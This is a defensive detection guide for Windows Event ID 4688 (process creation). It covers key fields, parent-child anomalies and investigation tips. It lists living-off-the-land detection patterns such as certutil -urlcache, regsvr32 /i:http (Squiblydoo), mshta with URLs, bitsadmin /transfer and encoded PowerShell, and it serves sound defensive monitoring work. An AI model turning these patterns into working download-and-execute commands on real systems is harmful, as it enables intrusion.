EventPeeker
Scan your Security and Sysmon logs·Detection guides
Event ID 4688Audit SuccessSecurityT1059

Windows Event ID 4688Process Created

Logged every time a new process is created on Windows. Requires Process Creation auditing to be enabled via Group Policy. With command-line logging enabled, 4688 captures the full arguments passed to each process — making it one of the most operationally valuable events for detecting living-off-the-land attacks, script-based execution, parent-child anomalies, and encoded payload delivery.

MITRE ATT&CK

Technique

T1059 · Command and Scripting Interpreter

Tactic

Execution

View on attack.mitre.org →

Why It Matters

Most attacks that execute code on Windows generate 4688 events. Without command-line logging, 4688 shows only the executable name; with it, you see the full command including encoded payloads, remote file paths, and LOLBin-specific flags. Parent-child relationships are the most reliable detection signal: legitimate applications have predictable parents, and deviations — Office spawning PowerShell, explorer.exe launching cmd.exe with base64 arguments — are near-definitive malicious execution indicators.

Key Fields

New Process NameFull path of the launched executable — look for suspicious paths (Users\, Temp\, AppData\), names mimicking system processes (svch0st.exe, Iexplore.exe with capital I), or known LOLBins (certutil.exe, mshta.exe, rundll32.exe, regsvr32.exe) running from unusual locations
Process Command LineFull command with arguments — requires GPO: Computer Configuration → Admin Templates → System → Audit Process Creation → 'Include command line in process creation events'. Key patterns: -EncodedCommand or -enc (base64 PowerShell), IEX/Invoke-Expression, certutil -urlcache/-decode, regsvr32 /s /n /u /i:http (Squiblydoo), mshta.exe http://, bitsadmin /transfer
Creator Process NameThe parent process — the most reliable detection signal. High-confidence anomalies: Office apps (winword.exe, excel.exe, powerpnt.exe, onenote.exe) spawning cmd.exe/powershell.exe/wscript.exe/mshta.exe; browser processes spawning script interpreters; LSASS spawning unexpected children
Subject Account NameThe account that launched the process — SYSTEM spawning unexpected user-space tools, or a standard user launching administrative binaries, indicates privilege abuse
Token Elevation Type%%1936 = full admin token (UAC elevated); %%1937 = standard/limited token; %%1938 = elevated via RunAs. Unexpected full elevation from a non-admin context indicates a UAC bypass or privilege escalation
New Process IDCorrelate with 4689 (exit) for process lifetime, and with 4663/4656 for file/object access within that process's context

Investigation Tips

  1. 1.Enable command-line logging first — without it, 4688 shows only the executable name and is far less valuable. GPO path: Computer Configuration → Administrative Templates → System → Audit Process Creation → 'Include command line in process creation events' → Enabled.
  2. 2.Parent-child anomaly: Office apps (winword.exe, excel.exe, powerpnt.exe, onenote.exe) spawning cmd.exe, powershell.exe, wscript.exe, mshta.exe, or cscript.exe = malicious macro or phishing document execution. Make this a high-priority alert with no exceptions.
  3. 3.Encoded PowerShell: look for -EncodedCommand or -enc in the command line. Legitimate PowerShell scripts rarely use encoding; attackers encode to bypass string-matching detection and obscure the payload. Decode with [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...')) and inspect.
  4. 4.LOLBin patterns to alert on: certutil.exe -urlcache or -decode (file download/decode); bitsadmin.exe /transfer (background downloader); regsvr32.exe /s /n /u /i:http (remote scriptlet — Squiblydoo, no disk write); mshta.exe with http:// argument (HTA payload); rundll32.exe executing non-System32 DLLs; wscript.exe/cscript.exe from Temp or AppData.
  5. 5.Process masquerading: check that New Process Name paths match expected locations. Legitimate svchost.exe is always in C:\Windows\System32\. Any executable with a system-process name but running from Users\, Temp\, or Desktop\ is masquerading — a common malware technique.
  6. 6.PPID spoofing: attackers can forge the parent PID to make malicious code appear as a child of a trusted process (e.g., appearing as a child of explorer.exe). Detect by correlating New Process ID lineage — if the reported parent has no matching 4688 event from the expected time, the parent PID is spoofed.
  7. 7.Short-lived encoded processes: 4688 (powershell.exe -enc ...) immediately followed by 4689 (exit) = one-shot command execution. Attackers run a single command and exit to minimize presence in running process lists and reduce dwell time.

Related Event IDs

4689Process exited — pair on Process ID for full execution lifetime
4104PowerShell script block — full script content for any PowerShell processes seen here
1102Audit log cleared — look for wevtutil.exe clearing Security logs via 4688
4624Logon event — correlate Subject Logon ID to establish session context
4697Service installed — services spawn processes; correlate to see what a service executed

Full Detection Guide Available

This event ID has a full detection guide with investigation steps, remediation advice, and example log entries.

View full guide for Event ID 4688

See Event ID 4688 in your logs

Upload a Windows Event Log (.evtx) file — EventPeeker automatically detects process created patterns, maps findings to MITRE ATT&CK, and generates an AI triage report.

Analyze EVTX Logs Free →
← All detection guides·Analyze EVTX Logs Free →